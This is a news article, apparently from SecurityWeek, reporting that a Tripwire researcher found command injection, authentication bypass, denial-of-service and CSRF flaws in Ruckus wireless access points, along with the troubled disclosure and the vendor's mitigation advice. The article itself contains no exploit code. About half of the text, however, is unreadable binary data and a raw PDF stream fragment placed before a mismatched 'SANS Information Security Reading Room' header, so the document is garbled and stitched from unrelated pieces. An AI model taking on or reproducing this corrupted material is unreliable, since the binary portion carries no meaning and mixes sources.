hbàÛ‘ÉÎC‡xTì<:<9 ›8< ß)1Saw­Âî:pÌ}TjŒ‡uË^æöÊÿ0•Ûk·êž§hș⭚ÏÞ¨¢T½RqIž(UüɃס–Ñ8ãn÷ï4D|Ÿ#GŽ"¯A±"ßôô1dCSˆí]H"²Î¼lé L«È~GiŽ±»%/îq8Ãßþ7½À½ì%Áú춬 »Ùë£çiìü'+}é–‹š„’åy€\I”ÄW]ô3TrPÝ°Ñྋ™t™ž;„ÁËffŽ;6c ±¤´ì£×ˆ_ˆÄÂ&i•¥×hüîIbÇC¥î•[,Ôˆè¼ûíVÂîøÁ›6 ;`7ìü†Àʁ š„’%°:Ž"®rƒ ºì•§ÅÏY½fíÞÀ¨˜øY!"'BÞ 2é25…° ×DÈ­|3…˜¾/CÎz¬0®GZå×éØ1§C¨D{Y€ãNôºŠŒ¸¼uÇÅoÝyñŸ™]ò6Ù]cÏÓ>؇¨L9Ð×µ(™Wr—4áxÝ…¤sTg¼þñ»…3"¢Bº|W âÓOœ<É_? "Á?~ü„ºé É bJÖ[r•%lB<°|§cG¡Rõ8œJ ,Ö;ÜÞ…ÝÍl•£WßU÷û®‹9S…&ÞÖ‚òVö¡ŠKj9âKB²Š ú û!—=ü+¹Àm—=ƒCOœ8y® âsÏœ9ƒŠ‚ƒÃàj¦ƒÅ¯C¬DNR,Ë¥°ù4Ïwzv

<¸¿ª¢¯¿ dÒˆK\Eå scÍãÌø6:̘Ê6vp“v¦Ã‡GG¡+z{Ÿpû{¥–ãJ®]Wˆ *9ãSŠ¼a5#~2û¢ŸÉU¿ËnwkEÛ)T Nà7Ÿrúôé¶6Ö㈤(ñP&!ÊÁSÅw•Š‰OœÏßȲÞË·8„{Jø¬²£ '\Ž£;8ÓÑDÄǬö=áþ!eLŽ¯ËΨfFüüJ‹ñþËïy~¹=ÂFôbÄÆ'"1ñ)==}ˆs-­pÁnülüp#ÄŒŒ,}ðTðqÝB‰O-¼RxíÖŠÚjÆÎßȈÀGìdp4ãcãÌ*vH5ö/½dŠ²§§¿qÏG,]Êßæ5ˆT¹3òˆjø„¢6œúúšBý‰ûËʿ÷ªÆ¦–¦æ[email protected]'P±¬¼Â€ïJ->%ñ)¢gcÅíHõ  àé âÌoqÜ&ÊvV÷‘òÔãSKªV²"8«ë vÚyhVj¶iâÍò¦§¦5ûúžÄîSjáŒoßÅ"*j‘M ruºøJÔ‰¢Øwزîg4B¥š¾ŽXʺݏ«­k¨«oD¤œm#ÄаÑhÆZ]¨l_FÊSÉŠ÷½ªâ“zïÜ‚føT¹b…‘"·Ã‡›ë¯œŸÐÕ××_XXˆ ö•´"û“žÿÛ÷iœQŽ¨zˆBØP‰ÁŠýËþ•H+î{¼L!î ¡!‹ªÐKáÚÍÍ-5µõ€ J ¡2ÄŠÊ*ñ=Y›çý—+eû£¼p ´4«««KKKQ ˆñ¾ Ä÷­AdÂF)1Pìã‡?¦ªžE†»‡·)D1Œ?/¿p¡$ ç±²ªºê@ ¢ìêîÑA¬®©ñ󲥿’ÒW/HîÏ)e;Sà$ ]´ø[email protected]|ÂõLØ8…ÑáÙÌBSEYVV¶ÿþŽŽS‚ˆ-RÒ¢" ¥Nä-6BÕP,}àŠë¿[ÄR1PJ†ˆX*n¨™šš:7$ „t©¨<ˆM͝]ÝÔš-CtÚ±S–`ñóÁ«ôéïß [email protected]ÈQîøpN::;mà3u=…mjG¸ÙD‰ü[^^ˆMMMÖ ˆ[¬AdêT­_¾E‘¦"!bé¶íÎòl¢¸+ª¸¤ôì݈äN7÷`ÔoÍ–!æäækô§!~*ê‰~Åm¬~ëÖŠŇsÒÙÙi ܼ­½S±ÅÚë:{kjj©¬¨Äææf bÿ€Q §¼Ä`u"µØ0Us‹šo`Jà%–ʺg„ˆXJ÷'ú¥ª°iY ¢Ž­Ù2ÄÏÖ®·4¿þ¤òÇÏï='ÒßmL³!ý1Æر¢UU¢m‚:OÔQm±áª†%Dc,½ÿrÑÚæà¸]7ï A„IJòŠ³qC8 ®>k 6·°¶PÄ”Ôt1ÎS¦?Y¿ƒ6~jÒŸ„ïC†ïÇŸ<ÐÙÙ%)OCð”#§.l9:yT¶©#dSS_šdf9¤¥¹åÀj‚8+Á¯ŒÂæ=QìKªÆKÕâºôák/XråO¼NHxœ"|“n÷FÝqòäü;ñ¿øâÀ*)-DȨPjЖ[email protected]¡?¥ø)ÒÔáŸãûˆá»t5'¨-¬á“sÜ¬àŽªfJ“Ž­©©…J#ˆ8cöBP!¾/ Ê Q©-º”j¸¤ÝO[·g DqÏ>NõWóª Ù˜'àzÅ%û±¶*¦U1#3[€úS-´éð-úñÇ÷ߥkƒ ¦Ée6K-óY,½‰±‘%Í’«.Y|µÈ†tW”"jCš=#m_æ©S§æá†ø†ÃÃ#…E¥EÅ¥ˆ¢¨©KB†¸mûÈÌ-l|éOmü$ õ"ð]úéx´Q|ŠÆ1=>«ì,°¦¦MGG!«¢œkkëfffæ1Î÷ߌ±”t)~>IJÙpç.Wã\p JS  '>|x®-¥Ô[[ßPPXˆ4S"Ô© RÔ: "`HJñSJ—®¾Å—~¶¤‹Ôâ›°Ÿ`'HM6£šòŒåÀÀ@CCƒžØÓÓ348„¯sôèQÄ"{ J ‘ÅRE—šº!²áb– Emh:¡Ÿ˜Çæ@u 2Úœ‚øôôta1M©TRS[‚:ˆ~þ–PvÀ'ŒÈéOKü>‹^úÙƒŒ Yüäø&'fç73›)(q`gª‰

%PDF-1.6 %äãÏÒ 1 0 obj [/PDF/ImageB/ImageC/ImageI/Text] endobj 4 0 obj <</Length 5 0 R /Filter/FlateDecode >> stream xœ endstream endobj 5 0 obj 8 endobj 6 0 obj <</Subtype/Image /Width 150 /Height 150 /BitsPerComponent 8 /ColorSpace/DeviceRGB /Filter/FlateDecode /Length 7 0 R >> stream xœígx]ŵ÷!!›póá^¾¼onè á’¼¸@hƒ &6„zÁÀIè6ظɲ-˲%Y]Vï½Z½ËjVï½Ë²lÉr’ûþgÖÞsf—st$ ‰÷³=Gçì}ÊþíµÖÍ̞ùßÿ=¿ßÎoç·óÛùíüv~;¿ßÎosޞjk﬩­/.-ËÍ/ŒOLŽKHŽOŠ‰KŒŽM€EÅÄGFÇEDņGÆÀÂ"¢³sóaûË*êšpøää‘sý;þ…¶écÇúúªkëò ŠSÓ3SÒ2RR÷%§¦'¥¤'&§%$ ¥Æ'¦Ø14<*$ ,’,($ †7))-ëìꞜœ<׿òŸm;yêÔÀà`]}#\,3+7#3g_FvzFVÚ¾,Sˆx”’Ãㄤ”ø4ŽJƒÃ‚BaØ­¨¤´£³ëÌ™3çúׇ·S§N WVUçææä îeåäefç ˆY9YÙyx>'¯ûäååçåãùþ2tÎ:…œ@ASÑ? æ·7(;'ï<Ê9m_~ùåÁƒãÈP…%ŒHAˆˆpâ’â’²Òýå°XiYqÉþ¢âÒ¢Råû ê<~Ë<484BÑ×?–•Û××®OÏ·z;}útOoyE•ŽHAa10••WÂ+*À°þ…YXˆ"‡Â7‘4]÷†È}üÂ#£Tל>ï’Ú ì !tD`eåUªkkjêªkêð ê@Í7 QÄXDW¢·ïހÀ|¹cÇfÎõ™;÷ÛéÓgÚ;:C&@5µu MP/0T ç"R. ½|üaˆêǎ;×gñÜlÐ=½} "pà/56575·66µ€à· "B+4R¤[email protected]Õ\ŠçúŒ~£ÛÈÈh}}#p"õ -­íÜÚš[Zç€âyáŸèéåóðòñðdæã»72:6" ¥DtjzÆÙ@¤b)[email protected]ôôöójmm;×çõ›ØŽÍ̀b$ pÔp …@ kkïhmë°bfVNDd´¯_Àf‡­«×¬]õ—÷ædŸ­]¿~ÃfW7$ 50š+DªAWD/ß„Ääééés}Ž¿® eÂððáA–è›;;»;»z cPsÙ1'7?4,b‡³Ë~2Wd¶íãO>Å•àíãrÞ~ˆpFè$ Gq§OEeÕ¹>Ù¿Í?ÞÖÖÑÐØL8ðà»z»º{f…˜_Päãë¿æÓu6¼òÖÊ'þôâ²Wž¾ý™mö­úÏvûò«¯úú…CØ ã¯mˆyù.»\§§Ôpædkñ•,¹ò‚¯ºàÁ«/xèê–’]sÁÃ’á_z;`7ìŒCp aå@q1€&|Ùø¹[·CÙΈˆJÝ=¼‹JJq ŸkóÜNž< 4¡ÀhxddxdthxÄÄä”´›¶Áýæ©E?yðj„ì!"uí¿¿ö‚e?g¶üç.ÿÅ…»Ž›úïò_`eO‚qøC*P•&>׉åºÏ7BºÌ 184冀ˆˆzêÔésMcn®:hN!‡‚ µ±°¨dÓf ;d+8ÅO–¨à«ÔàS„Œ`=z³?üòÂÇ`×3{ÜŠÑ«Ø ;ÓQ€é/T *M|G g_üâãFŽÁa¶!Rù/ b¤’sÅÞ ø¦¦¦ETăѱƒÇ·±¾¡i»ÓN,¹þñ».yà*Åãdp‚Ú~©Àzâ¿™=yÃ…OÁ~uáa¿fö´dô^ÂØ ;ÓQ„•€M%÷J| ¸¤Nü8lÙp¶!"¢ ˆÐ9€ø폨ø†GQ±·¯ÿÐÄaØø¡ Sˆ cdÇÒ9ÅIœêhDíIÎtžý¿Ÿåö܍°ïÁž7‰í‰Cžápñ&TÐ|ä: Jî’—

hbàÛ‘ÉÎC‡xTì<:<9 ›8< ß)1Saw­Âî:pÌ}TjŒ‡uË^æöÊÿ0•Ûk·êž§hș⭚ÏÞ¨¢T½RqIž(UüɃס–Ñ8ãn÷ï4D|Ÿ#GŽ"¯A±"ßôô1dCSˆí]H"²Î¼lé L«È~GiŽ±»%/îq8Ãßþ7½À½ì%Áú춬 »Ùë£çiìü'+}é–‹š„’åy€\I”ÄW]ô3TrPÝ°Ñྋ™t™ž;„ÁËffŽ;6c ±¤´ì£×ˆ_ˆÄÂ&i•¥×hüîIbÇC¥î•[,Ôˆè¼ûíVÂîøÁ›6 ;`7ìü†Àʁ š„’%°:Ž"®rƒ ºì•§ÅÏY½fíÞÀ¨˜øY!"'BÞ 2é25…° ×DÈ­|3…˜¾/CÎz¬0®GZå×éØ1§C¨D{Y€ãNôºŠŒ¸¼uÇÅoÝyñŸ™]ò6Ù]cÏÓ>؇¨L9Ð×µ(™Wr—4áxÝ…¤sTg¼þñ»…3"¢Bº|W âÓOœ<É_? "Á?~ü„ºé É bJÖ[r•%lB<°|§cG¡Rõ8œJ ,Ö;ÜÞ…ÝÍl•£WßU÷û®‹9S…&ÞÖ‚òVö¡ŠKj9âKB²Š ú û!—=ü+¹Àm—=ƒCOœ8y® âsÏœ9ƒŠ‚ƒÃàj¦ƒÅ¯C¬DNR,Ë¥°ù4Ïwzv

<¸¿ª¢¯¿ dÒˆK\Eå scÍãÌø6:̘Ê6vp“v¦Ã‡GG¡+z{Ÿpû{¥–ãJ®]Wˆ *9ãSŠ¼a5#~2û¢ŸÉU¿ËnwkEÛ)T Nà7Ÿrúôé¶6Ö㈤(ñP&!ÊÁSÅw•Š‰OœÏßȲÞË·8„{Jø¬²£ '\Ž£;8ÓÑDÄǬö=áþ!eLŽ¯ËΨfFüüJ‹ñþËïy~¹=ÂFôbÄÆ'"1ñ)==}ˆs-­pÁnülüp#ÄŒŒ,}ðTðqÝB‰O-¼RxíÖŠÚjÆÎßȈÀGìdp4ãcãÌ*vH5ö/½dŠ²§§¿qÏG,]Êßæ5ˆT¹3òˆjø„¢6œúúšBý‰ûËʿ÷ªÆ¦–¦æ[email protected]'P±¬¼Â€ïJ->%ñ)¢gcÅíHõ  àé âÌoqÜ&ÊvV÷‘òÔãSKªV²"8«ë vÚyhVj¶iâÍò¦§¦5ûúžÄîSjáŒoßÅ"*j‘M ruºøJÔ‰¢Øwزîg4B¥š¾ŽXʺݏ«­k¨«oD¤œm#ÄаÑhÆZ]¨l_FÊSÉŠ÷½ªâ“zïÜ‚føT¹b…‘"·Ã‡›ë¯œŸÐÕ××_XXˆ ö•´"û“žÿÛ÷iœQŽ¨zˆBØP‰ÁŠýËþ•H+î{¼L!î ¡!‹ªÐKáÚÍÍ-5µõ€ J ¡2ÄŠÊ*ñ=Y›çý—+eû£¼p ´4«««KKKQ ˆñ¾ Ä÷­AdÂF)1Pìã‡?¦ªžE†»‡·)D1Œ?/¿p¡$ ç±²ªºê@ ¢ìêîÑA¬®©ñ󲥿’ÒW/HîÏ)e;Sà$ ]´ø[email protected]|ÂõLØ8…ÑáÙÌBSEYVV¶ÿþŽŽS‚ˆ-RÒ¢" ¥Nä-6BÕP,}àŠë¿[ÄR1PJ†ˆX*n¨™šš:7$ „t©¨<ˆM͝]ÝÔš-CtÚ±S–`ñóÁ«ôéïß [email protected]ÈQîøpN::;mà3u=…mjG¸ÙD‰ü[^^ˆMMMÖ ˆ[¬AdêT­_¾E‘¦"!bé¶íÎòl¢¸+ª¸¤ôì݈äN7÷`ÔoÍ–!æäækô§!~*ê‰~Åm¬~ëÖŠŇsÒÙÙi ܼ­½S±ÅÚë:{kjj©¬¨Äææf bÿ€Q §¼Ä`u"µØ0Us‹šo`Jà%–ʺg„ˆXJ÷'ú¥ª°iY ¢Ž­Ù2ÄÏÖ®·4¿þ¤òÇÏï='ÒßmL³!ý1Æر¢UU¢m‚:OÔQm±áª†%Dc,½ÿrÑÚæà¸]7ï A„IJòŠ³qC8 ®>k 6·°¶PÄ”Ôt1ÎS¦?Y¿ƒ6~jÒŸ„ïC†ïÇŸ<ÐÙÙ%)OCð”#§.l9:yT¶©#dSS_šdf9¤¥¹åÀj‚8+Á¯ŒÂæ=QìKªÆKÕâºôák/XråO¼NHxœ"|“n÷FÝqòäü;ñ¿øâÀ*)-DȨPjЖ[email protected]¡?¥ø)ÒÔáŸãûˆá»t5'¨-¬á“sÜ¬àŽªfJ“Ž­©©…J#ˆ8cöBP!¾/ Ê Q©-º”j¸¤ÝO[·g DqÏ>NõWóª Ù˜'àzÅ%û±¶*¦U1#3[€úS-´éð-úñÇ÷ߥkƒ ¦Ée6K-óY,½‰±‘%Í’«.Y|µÈ†tW”"jCš=#m_æ©S§æá†ø†ÃÃ#…E¥EÅ¥ˆ¢¨©KB†¸mûÈÌ-l|éOmü$ õ"ð]úéx´Q|ŠÆ1=>«ì,°¦¦MGG!«¢œkkëfffæ1Î÷ߌ±”t)~>IJÙpç.Wã\p JS  '>|x®-¥Ô[[ßPPXˆ4S"Ô© RÔ: "`HJñSJ—®¾Å—~¶¤‹Ôâ›°Ÿ`'HM6£šòŒåÀÀ@CCƒžØÓÓ348„¯sôèQÄ"{ J ‘ÅRE—šº!²áb– Emh:¡Ÿ˜Çæ@u 2Úœ‚øôôta1M©TRS[‚:ˆ~þ–PvÀ'ŒÈéOKü>‹^úÙƒŒ Yüäø&'fç73›)(q`gª‰


SANS Information Security Reading Room

Black Hat USA 2016 – Ruckus Wireless, a global company that specializes in wireless networking equipment for enterprises and service providers, is working on developing patches for several vulnerabilities identified by an expert in its access point (AP) products.

Tripwire researcher Craig Young discovered that Ruckus wireless APs are plagued by various types of security holes that can be exploited to gain complete access to the device and its underlying operating system. While the expert only tested the Ruckus ZoneFlex H500 model, the vendor has determined that all its APs are vulnerable, except for the “unleashed” product line.

Young quickly identified several vulnerabilities in the product’s web-based user interface. He first uncovered a command injection flaw that allowed him to get a root shell on the device. The researcher also found an authentication bypass issue that can be leveraged to process requests that should normally be possible only for authenticated users.

According to Young, Ruckus APs are also plagued by a weakness that allows attackers to cause the management interface to become unavailable (i.e. cause a denial-of-service condition) by accessing a certain page over HTTPS. The said page is normally accessible over HTTP without authentication.

A DoS condition can also be triggered by sending authenticated requests to a certain page, which causes the HTTP server to reload – and possibly disrupts other services – due to excessive memory consumption.Ruckus ZoneFlex AP vulnerabilities

The expert also noticed that the HTTP server leaks the device’s serial number, which he believes could be used in social engineering attacks.

Many of these vulnerabilities can be exploited via cross-site request forgery (CSRF) attacks, which, according to Young, are possible due to the general lack of CSRF tokens.

The security holes were uncovered in the first part of 2015, but Tripwire and the CERT Coordination Center (CERT/CC) had experienced difficulties in reporting the issues to the vendor. Ruckus only acknowledged the problem late last month after one of the company’s executives was contacted over LinkedIn by Tripwire’s chief research officer David Meltzer.

In an advisory shared with SecurityWeek, Ruckus pointed out that the flaws found by Tripwire are only exploitable if the APs web interface and IP are accessible from external hosts.

“Most of Ruckus APs are deployed in managed environment where there is WLAN controller that is managing the APs. In this mode of operation the Web interface is not enabled and in most cases even the IP address of the AP is not reachable from external sources. This prevents from these vulnerabilities from getting exploited,” Ruckus said in its advisory.

Until patches are made available – Ruckus expects to release firmware updates in the next 3-6 months – the company has advised customers to disable access to the AP’s web interface from the command line interface (CLI) or limit access to the internal network. For scenarios where the AP needs to be accessed over the Internet, firewall policies should be used to limit access to authorized IP addresses.

“Unleashed AP models are not vulnerable to un-authenticated command injection issue on the Web interface,” Ruckus said. “SZ/SCG and ZD product line are only vulnerable to CSRF. They are not vulnerable to un-authenticated command injection issue on the Web interface.”

Young agrees that most network administrators would have no reason to expose the vulnerable web interface to the Internet, but he believes remote attacks are still possible.

“The more likely attack vector as I see it would be from users connected directly to the access point or via cross-site request forgery through phishing, malvertising, or XSS flaws on popular web sites,” Young told SecurityWeek.

The researcher said the goal of this research has been to test if enterprise-grade networking products are more secure than the highly vulnerable SOHO devices.

“My experience auditing Ruckus equipment is very similar to some of the experiences I’ve had auditing the wireless routers you might find in a local computer store. In fact, the authentication bypass and command injection are essentially the same problems I have found on SOHO devices in the $ 100-$ 200 range,” Young said in a blog post.

“Organizations using Ruckus devices may be at risk for compromise, particularly when the access points are used to provide customers with Wi-Fi access,” the expert added. “An intruder to one of these systems could potentially become man-in-the-middle to all other users of the wireless network allowing a wide range of exploitation opportunities.”

Related: Cisco, Juniper Patch Operating System Flaws

Related: Critical Flaws Found in Cisco Networking Products

Related: Critical Flaw Exposes Mobile Devices, Networks to Attacks

view counter

Previous Columns by Eduard Kovacs:

Tags:


SecurityWeek RSS Feed